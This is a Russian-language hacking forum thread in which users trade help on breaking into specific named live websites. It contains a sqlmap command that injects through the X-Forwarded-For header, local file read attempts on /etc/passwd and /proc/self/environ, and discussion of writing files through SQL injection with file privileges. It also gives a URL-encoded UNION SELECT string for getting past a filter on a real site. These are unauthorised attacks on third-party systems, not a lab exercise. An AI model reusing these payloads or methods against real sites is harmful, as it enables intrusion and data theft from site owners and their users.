ссылка на сам сайт: http://payeer-surf.ru/ сами ошибки с описанием) в CSS детали атаки схожи между вариантами, а в SQL инъекции везде одинаковое описание) как такое пробивается?
это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap
в sqlmap она не заведется. хотя правильный синтаксис такой: Code: sqlmap -u "http://payeer-surf.ru/" --headers="X-Forwarded-For: *" --dbs проблема в том, что ошибка появляется при подстановке одинарной и двойной кавычки, пока не понял, почему так. т. е. Code: X-Forwarded-For: 10.67.90.16"'
Здравствуйте ! PHP: http://www.avizinfo.com.ua/templates/js.php?files=/etc/passwd&side=front можно тут что-то придумать? При запросе /proc/self/environ . выдаётся страница с текстом pool www . Так же и на другие логи. Почему не инклудится index? PHP: http://kafa-info.com.ua/vh/index.php?pid=\ HTML: http://papajohn.com.ua/ajax/catalog-change/?add=1&model_id=3 fucking day как тут раскручивать ? Что-то я не догоняю. заранее спасибо )
по papajohn.com.ua это просто лог с ошибкой запроса, параметры в нем не участвуют. kafa-info.com.ua: я не понял откуда ноги растут там, ничего не скажу avizinfo.com.ua: по-моему там не инклуд, а просто читалка. не уверен, особо не смотрел
День добрый. Нашел скулю и по традиции всегда начинаю смотреть права. File-priv=Y. Отлично, далее смотрю отсчет акунетикса, написано Application Error Mesage, там давала ошибку с раскрытием пути функция отвечающая за шифрование пароля в md5. Поставил в sqlmap, и получал еррор, директория недоступна для записи. Потом я еще нашел phpinfo, попробовал подставлять пути из него и снова облом, даже в темповскую директорию ничего не грузит. Payload: Не пойму почему так происходит, я в раскрутке скуль далеко не проф, разве что UNION инъекцию раскрутить смогу. Почему-то файлы читать читаются, а чего-нибудь загрузить так нет. Еще в логах sqlmap'а нет привычного мне INTO OUTFILE метода, только LINES TERMINATED BY. Что полезного можно из этого извлечь? P.S Посмотри пароль от БД и зайди, через phpmyadmin например, не катит. Нет ни phpmyadmin'а, ни пароля..
http://www.trial-ch.org/trialwatch/tw_map_coord.php?Lang=en&CF=&JF=11+order+by+1+--+ нужно фильтр обойти
Code: www.trial-ch.org/trialwatch/tw_map_coord.php?Lang=en&CF=&JF=11+%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31--+
где там ошибка? у вас там инклуд рядом, не хотите с ним что-нибудь придумать? правда там open_basedir() Code: http://www.trial-ch.org/trialwatch/tw_map_coord.php?Lang=lol
Видел, но с ним не чё не сделать( Ошибка mysql_fetch_array() expects parameter 1 to be resource Можно как нить вывод замутить?
